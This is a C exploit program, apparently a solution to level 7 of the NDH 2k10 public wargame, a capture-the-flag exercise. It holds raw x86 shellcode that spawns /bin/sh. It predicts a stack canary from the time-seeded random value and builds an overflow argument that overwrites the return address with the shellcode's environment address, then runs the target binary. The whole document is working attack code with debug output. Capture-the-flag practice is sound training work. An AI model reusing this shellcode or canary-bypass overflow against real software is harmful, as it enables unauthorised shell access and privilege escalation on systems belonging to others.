NDH 2k10 public wargame, level7, exploit

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <unistd.h>
4. #include <string.h>
5.  
6. //Target program
7. char target_path[] = "/home/level7/level7";
8. char target_name[] = "level7";
9. //Shellcode to spawn a shell
10. char *shellcode[] = {"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", (char *)0};
11.  
12. int main(int argc, char *argv[])
13. {
14.  char arg[85];      //Argument like {<prog> "<garbage[64]><canary[4]><garbage[12]><eip[4]>"}
15.  char canary[5];    //Canary in little-endian string
16.  char eip[5];       //Eip in little-endian string
17.  
18.  //Getting shellcode address in environment variable array *shellcode[]
19.  unsigned int shaddr = 0xbffffffc - (strlen(target_path)+1 + strlen(shellcode[0])+1);
20.  
21.  //Generate the random value based on system time
22.  srand(time(NULL));
23.  unsigned int r = random();
24.  
25.  //Convert canary and @shellcode into little-endian
26.  snprintf(canary, 5, "%c%c%c%c", (char)r&0x000000FF, (char)(r >> 8)&0x000000FF, (char)(r >> 16)&0x000000FF, (char)(r >> 24)&0x000000FF);
27.  snprintf(eip, 5, "%c%c%c%c", (char)shaddr&0x000000FF, (char)(shaddr >> 8)&0x000000FF, (char)(shaddr >> 16)&0x000000FF, (char)(shaddr >> 24)&0x000000FF);
28.  //Concat arg string
29.  snprintf(arg, 85, "----------------------------------------------------------------%s------------%s", canary, eip);
30.  
31.  //Debug info
32.  printf("Arg = %s\n", arg);
33.  printf("Canary = 0x%08X <-> %s\n", r, canary);
34.  printf("@sh = 0x%08x <-> eip = %s\n\n", shaddr, eip);
35.  
36.  //Exploit
37.  if(!execle(target_path, target_name, arg, (char *)0, shellcode))
38.  {
39.   perror("Unable to execute the target.\n");
40.   exit(1);
41.  }
42.  return 0;
43. }